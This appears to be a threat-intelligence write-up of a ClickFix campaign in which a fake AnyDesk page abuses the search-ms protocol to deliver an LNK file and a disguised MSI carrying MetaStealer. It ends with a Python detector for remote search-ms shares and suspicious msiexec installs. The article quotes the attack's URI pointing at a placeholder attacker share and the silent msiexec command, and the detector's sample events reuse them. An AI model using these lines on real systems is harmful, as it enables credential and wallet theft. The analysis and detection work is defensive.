Emerging ClickFix Attack Disguises as AnyDesk Installer to Deploy MetaStealer

A sophisticated variant of the ClickFix attack has surfaced, masquerading as a legitimate AnyDesk installer to disseminate the MetaStealer infostealer. This campaign employs a counterfeit Cloudflare Turnstile verification page to deceive users into executing a specially crafted Windows protocol handler, ultimately delivering a malicious MSI package camouflaged as a PDF document.

As organizations bolster their defenses against conventional social engineering tactics, cybercriminals are adapting by integrating familiar lures with unexpected system components to circumvent detection and exfiltrate sensitive credentials.

Deceptive Landing Page and Initial Lure

In early August, individuals searching for the AnyDesk remote access tool encountered a fraudulent landing page at anydeesk[.]ink/download/anydesk.html. This page presented what appeared to be a standard Cloudflare Turnstile prompt, complete with a “Verify you are human” button.

Upon clicking this button, victims were not directed to paste a command into the Run dialog box, as seen in traditional ClickFix attacks. Instead, they were redirected into Windows File Explorer via the search-ms URI handler. This subtle shift in the redirection mechanism exploits the lesser-monitored Windows Search protocol, catching security teams off-guard.

Infection Chain and Payload Delivery

The attack sequence unfolds when the search-ms URI invokes a remote SMB share, delivering a Windows shortcut file named Readme Anydesk.pdf.lnk to the victim’s system. Unlike previous ClickFix variants that rely on clipboard-pasted PowerShell commands, this attack automatically launches the LNK payload. This payload executes a script to download and install two components:

1. The genuine AnyDesk installer, hosted on Microsoft Edge to maintain plausibility.

2. A decoy PDF served from chat1[.]store.

The decoy file is, in reality, an MSI package that dynamically incorporates the victim’s hostname into its download URL by leveraging the %COMPUTERNAME% environment variable. Once downloaded, the MSI is installed using the following command:

```shell
msiexec /i %TEMP%\%%COMPUTERNAME%%.msi /quiet
```

After installation, metadata reveals two primary artifacts:

1. A CustomActionDLL responsible for orchestrating the setup.

2. A CAB archive containing ls26.exe (the MetaStealer dropper) and cleanup scripts.

Technical Analysis of MetaStealer

The ls26.exe file is protected with Private EXE Protector and exhibits characteristic behaviors of MetaStealer, including:

– Credential harvesting from browsers.

– Theft of cryptocurrency wallet information.

By abusing legitimate Windows protocols and file handling mechanisms, this attack evades sandbox detection and security alerts until the final payload executes its malicious logic.

Exploitation of Windows Search Protocol

Central to this campaign is the innovative use of Windows Search. By invoking the search-ms URI protocol, attackers bypass the Run dialog restrictions in hardened environments and introduce payloads directly through File Explorer. The following URI snippet illustrates the redirection:

```shell
search-ms:displayname=AnyDesk%20Secure%20Access;crumb=location:\\attacker-smb\share
```

Once the user confirms the File Explorer prompt, the LNK file silently executes the download routines. The MSI’s CustomActionDLL then triggers the retrieval of Binary.bz.WrappedSetupProgram, which unpacks ls26.exe and 1.js. The JavaScript file ensures the removal of intermediary files, while ls26.exe initiates the data exfiltration phase.

Implications and Recommendations

This emerging tactic underscores the importance of monitoring unconventional extensions of trusted system features. Defenders should consider implementing strict protocol handler policies, SMB auditing, and contextual analysis of MSI installations to detect and disrupt these sophisticated social engineering campaigns.
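The two recommendations above that lend themselves to automation are protocol handler monitoring (the search-ms URI shown in the Windows Search section) and contextual analysis of msiexec command lines (the install command shown in the payload delivery section). The following Python is an added example, not code from the article or from any vendor's detection content: it parses search-ms URIs and flags any crumb=location: that points at a UNC path on a remote host, and it scores msiexec invocations on three indicators the article describes (quiet install, package in a temp directory, package named after the machine). The telemetry records in SAMPLE_EVENTS are constructed for the example; the URI and command quoted from the article are reused verbatim (attacker-smb is the article's own placeholder), and the expanded path, hostname WS-4471 and the benign vendor install are invented controls.

```python
import re
from urllib.parse import unquote

# --- search-ms URI parsing ---------------------------------------------------

# A UNC path: two leading backslashes, a host, a separator, then the share/path.
UNC_RE = re.compile(r"^\\\\([^\\/]+)[\\/](.*)$")


def parse_search_ms(uri):
    """Split a search-ms: URI into a dict of lists of parameter values.

    search-ms separates parameters with '&'; the URI quoted in the article
    uses ';', so both are accepted. Values are percent-decoded and repeated
    keys (several crumb= entries are legal) are kept in order.
    """
    if not uri.lower().startswith("search-ms:"):
        return None
    params = {}
    for part in re.split(r"[&;]", uri[len("search-ms:"):]):
        if not part:
            continue
        key, _, value = part.partition("=")
        params.setdefault(key.strip().lower(), []).append(unquote(value))
    return params


def remote_search_hosts(uri):
    """Return the host of every crumb=location: value that is a UNC path.

    A local crumb such as location:C:\\Users\\... yields nothing; only a
    location that would make File Explorer open a remote share is reported.
    """
    params = parse_search_ms(uri)
    if not params:
        return []
    hosts = []
    for crumb in params.get("crumb", []):
        if crumb.lower().startswith("location:"):
            m = UNC_RE.match(crumb[len("location:"):])
            if m:
                hosts.append(m.group(1))
    return hosts


# --- msiexec command-line analysis -------------------------------------------

MSIEXEC_RE = re.compile(r'(?:^|[\\\s"])msiexec(?:\.exe)?\b', re.I)
# /i or -i followed by a quoted or unquoted package path.
INSTALL_RE = re.compile(r'(?:^|\s)[/-]i\s+(?:"([^"]+)"|(\S+))', re.I)
# /q, /qn, /qb, /qr, /qf, /quiet (and the dash forms).
QUIET_RE = re.compile(r"(?:^|\s)[/-]q(?:n|b|r|f|uiet)?(?=\s|$)", re.I)
TEMP_RE = re.compile(r"%TEMP%|%TMP%|\\Temp\\", re.I)


def msiexec_findings(cmdline, hostname=None):
    """List the indicators present in one msiexec command line.

    Both the unexpanded form quoted in the article (%%COMPUTERNAME%%) and
    the expanded form a process-creation log would record are handled; the
    expanded form is matched against the logging host's own name.
    """
    if not MSIEXEC_RE.search(cmdline):
        return []
    m = INSTALL_RE.search(cmdline)
    if not m:
        return []
    package = m.group(1) or m.group(2)
    findings = []
    if QUIET_RE.search(cmdline):
        findings.append("quiet install")
    if TEMP_RE.search(package):
        findings.append("package in temp directory")
    base = package.replace("/", "\\").rsplit("\\", 1)[-1]
    name = re.sub(r"\.msi$", "", base, flags=re.I)
    unexpanded = "%COMPUTERNAME%" in name.upper().replace("%%", "%")
    if unexpanded or (hostname and name.lower() == hostname.lower()):
        findings.append("package named after hostname")
    return findings


def analyze_events(events):
    """Run both checks over telemetry records; return (index, finding) pairs."""
    results = []
    for i, ev in enumerate(events):
        if ev["kind"] == "uri":
            for host in remote_search_hosts(ev["value"]):
                results.append((i, f"search-ms opens remote share on {host}"))
        elif ev["kind"] == "process":
            for f in msiexec_findings(ev["cmdline"], ev.get("hostname")):
                results.append((i, f"msiexec: {f}"))
    return results


# Constructed sample records for this example (not telemetry from the article).
SAMPLE_EVENTS = [
    {"kind": "uri", "value": r"search-ms:displayname=AnyDesk%20Secure%20Access;crumb=location:\\attacker-smb\share"},
    {"kind": "uri", "value": r"search-ms:query=report&crumb=location:C:\Users\alice\Documents"},
    {"kind": "process", "hostname": "WS-4471", "cmdline": r"msiexec /i %TEMP%\%%COMPUTERNAME%%.msi /quiet"},
    {"kind": "process", "hostname": "WS-4471", "cmdline": r"msiexec.exe /i C:\Users\alice\AppData\Local\Temp\WS-4471.msi /qn"},
    {"kind": "process", "hostname": "WS-4471", "cmdline": r'msiexec.exe /i "C:\Program Files\Vendor\tool.msi" /qn'},
]

if __name__ == "__main__":
    for idx, finding in analyze_events(SAMPLE_EVENTS):
        print(idx, finding)
```

A quiet install on its own is routine (the benign vendor record produces only that finding), so an alerting rule built on this should require the temp-directory or hostname indicator in addition, while any search-ms URI that resolves to a remote host is worth an alert by itself in an environment where users are not expected to open shares that way.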